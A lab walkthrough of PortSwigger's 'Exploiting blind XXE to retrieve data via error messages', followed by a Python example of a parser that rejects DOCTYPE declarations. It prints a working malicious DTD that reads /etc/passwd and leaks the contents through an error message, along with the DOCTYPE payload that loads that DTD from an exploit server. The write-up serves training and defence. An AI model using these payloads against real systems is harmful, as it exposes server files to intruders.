
Exploiting blind XXE to retrieve data via error messages

Introduction

So, this is our 6th lab where we are solving the official PortSwigger Web Security labs. Today, we will solve the “Exploiting Blind XXE to Retrieve Data via Error Messages” lab. Just like in the previous lab, we store a malicious DTD file on an external server and make the target's XML parser load it through an XXE vulnerability. The difference is that this time the parser produces no output, so we use the error message it returns to carry the file contents.


Lab Description Of Exploiting blind XXE to retrieve data via error messages

In this lab, we have a “Check stock” feature that parses XML input. However, the parsed values are not reflected in the response, so we cannot read the file directly. To solve this lab, we need to use an external DTD to trigger a parsing error whose message includes the contents of the /etc/passwd file.

The lab also provides a link to an exploit server, where we can host the malicious DTD file.

Lab Solution


First, we will access the lab. Once inside, we have an option to go to the exploit server. We will click on “Go to exploit server” and host our malicious DTD file there.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

This is the malicious DTD that we will store on the exploit server. The %file parameter entity reads /etc/passwd, %eval defines a second entity (%exfil) whose SYSTEM URI embeds that content in a path that does not exist, and when the parser tries to load %exfil the resulting error message echoes the invalid path, file contents included.


As you can see in the screenshot above, I first opened the “Go to exploit server” option, pasted the DTD into the body, and stored it. After that, I clicked on “View exploit”, and the exploit is now ready.

Next, I will exploit the stock checker feature by adding a parameter entity that references the malicious DTD.


Now, let’s go back to the lab and view the details of any product. On the product page, we will see the stock check feature.


We will click on “Check stock” and intercept the request using Burp Suite. Once intercepted, we will send it to the Repeater tab for further testing.


In the Repeater tab, insert the following DOCTYPE declaration into the body of the POST request, between the XML declaration and the root element:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>

Then replace YOUR-DTD-URL with the URL of the DTD file we stored on the exploit server and send the request.


As you can see, the error message in the response contains the contents of the /etc/passwd file.

Our final payload is:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a33006f041fa2bc81fb9ac601760061.exploit-server.net/exploit"> %xxe;]>
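As an added defensive counterpart to the payload above (example code, not part of the original lab or this write-up), the following Python shows how a stock-check endpoint can refuse the attack at the parser: the expat DOCTYPE handler fires as soon as `<!DOCTYPE` is seen, before the `%xxe;` reference in the internal subset is ever read. The request bodies and the placeholder exploit-server URL are constructed for this example.

```python
import xml.parsers.expat

# Constructed sample bodies for this example (not captured from the lab).
BENIGN_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>'
)
# Same shape as the lab payload; the exploit-server URL is a placeholder.
XXE_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://EXPLOIT-SERVER-PLACEHOLDER/exploit"> %xxe;]>'
    '<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>'
)


class DoctypeRejected(ValueError):
    """Raised when the input carries a DTD, which stock-check XML never needs."""


def parse_stock_check(body: str) -> dict:
    """Return {'productId': ..., 'storeId': ...}, refusing any DTD outright."""
    parser = xml.parsers.expat.ParserCreate()
    fields, text = {}, []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at '<!DOCTYPE', before the internal subset (and its %xxe; reference) is read.
        raise DoctypeRejected(f"DOCTYPE {name!r} is not allowed in stock-check input")

    def external_entity_ref(context, base, system_id, public_id):
        # Belt and braces: never fetch an external entity, whatever a DTD declared.
        raise DoctypeRejected(f"external entity {system_id!r} refused")

    def start_element(name, attrs):
        text.clear()

    def end_element(name):
        if name in ("productId", "storeId"):
            fields[name] = "".join(text).strip()

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = text.append
    parser.EndElementHandler = end_element
    parser.Parse(body, True)
    return fields


def is_rejected(body: str) -> bool:
    """True if the hardened parser refuses the body instead of parsing it."""
    try:
        parse_stock_check(body)
    except DoctypeRejected:
        return True
    return False
```

The benign request still parses to its two fields, while the injected DOCTYPE is rejected before any entity is declared, so no error message carrying file contents is ever produced.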

Now, let’s refresh the lab and check if it has been successfully solved or not.


So, we have successfully solved the lab “Exploiting blind XXE to retrieve data via error messages”. Congratulations to all of you! This was our 6th article on XML injection, which falls under the category of web security. If you’re interested in exploring web security further, you can study from our website.

To continue studying, check out the next lab, Exploiting XInclude To Retrieve Files; finish the current lab before moving on to the next one. Good luck!
